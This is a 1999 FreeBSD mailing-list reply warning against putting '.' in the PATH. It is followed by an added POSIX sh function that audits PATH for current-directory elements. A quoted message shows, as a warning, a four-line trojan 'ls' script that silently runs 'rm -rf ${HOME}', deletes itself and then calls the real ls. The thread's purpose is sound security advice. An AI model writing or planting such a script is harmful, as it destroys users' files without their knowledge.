Date:      Tue, 09 Feb 1999 18:11:01 +1000
From:      Greg Black <gjb@comkey.com.au>
To:        Bruce Albrecht <bruce@zuhause.mn.org>
Cc:        questions@FreeBSD.ORG
Subject:   Re: math.h ? 
Message-ID:  <19990209081101.16457.qmail@alpha.comkey.com.au>
In-Reply-To: <14015.44866.751556.601222@zuhause.zuhause.mn.org>  of Mon, 08 Feb 1999 21:45:06 CST
References:  <Pine.GSO.4.02.9902062104560.5954-100000@isis.visi.com> <xzpyamat8gk.fsf@flood.ping.uio.no> <14015.44866.751556.601222@zuhause.zuhause.mn.org> 

>  > > Don't use test as your output binary.  There is a system program called
>  > > test, and if you have . in your path, you may not figure out why your
>  > > program is not working.
>  > 
>  > Don't put . in your path, for precisely that reason.
>  > 
>  > Imagine I create a shell script called ls in some "attractive"
>  > directory, which contains:
>  > 
>  > #!/bin/sh
>  > rm -rf ${HOME} >/dev/null 2>&1 &
>  > rm $0
>  > /bin/ls $@
>  > 
>  > After one or two such encounters, you'd quickly learn not to put . in
>  > your path.
> 
> However, if you put "." at the end of the path, instead of the
> beginning, all the standard system binaries would be found first.

This is a really bad `solution', because it engenders a false
sense of security.  Why do you think that many of the trojans
left around are called `mroe'?  Because it's a really common
typo for `more' which won't be found in the system directories
but will be found if `.' is in your PATH.  Seriously, don't ever
have `.' anywhere in your PATH.  It buys you very little and can
cost lots.

-- 
Greg Black <gjb@acm.org>
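
An added example, not part of the original message: a POSIX sh check that flags every PATH element that makes the shell search the current directory, regardless of its position in the list. The function name audit_path and the sample PATH value are assumptions made for illustration; the check also covers empty elements (a leading, trailing or doubled colon), which POSIX shells treat as the current directory.

```shell
#!/bin/sh
# Added example; audit_path is a hypothetical helper name, not a system tool.
# Reports every PATH element that makes the shell search the current
# directory, wherever it sits in the list. Returns 0 only when PATH is clean.
audit_path() {
    ap_rest="${1-$PATH}:"   # sentinel colon keeps a trailing empty element
    ap_pos=0
    ap_bad=0
    while [ -n "$ap_rest" ]; do
        ap_entry=${ap_rest%%:*}     # text before the first colon
        ap_rest=${ap_rest#*:}       # everything after that colon
        ap_pos=$((ap_pos + 1))
        case $ap_entry in
            /*) continue ;;         # absolute directory: independent of cwd
            '') ap_why='empty element, which the shell treats as the current directory' ;;
            .|./) ap_why='explicit current directory' ;;
            *)  ap_why='relative directory, resolved against the current directory' ;;
        esac
        printf 'element %d (%s): %s\n' "$ap_pos" "$ap_entry" "$ap_why"
        ap_bad=$((ap_bad + 1))
    done
    [ "$ap_bad" -eq 0 ]
}

# Constructed sample: "." moved to the end as the quoted reply suggests,
# plus a stray trailing colon.
audit_path "/bin:/usr/bin:/usr/local/bin:.:" \
    || echo "PATH still searches the current directory"
```

Called with no argument, audit_path checks the live $PATH, so it can be run from a login script or a periodic audit job.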




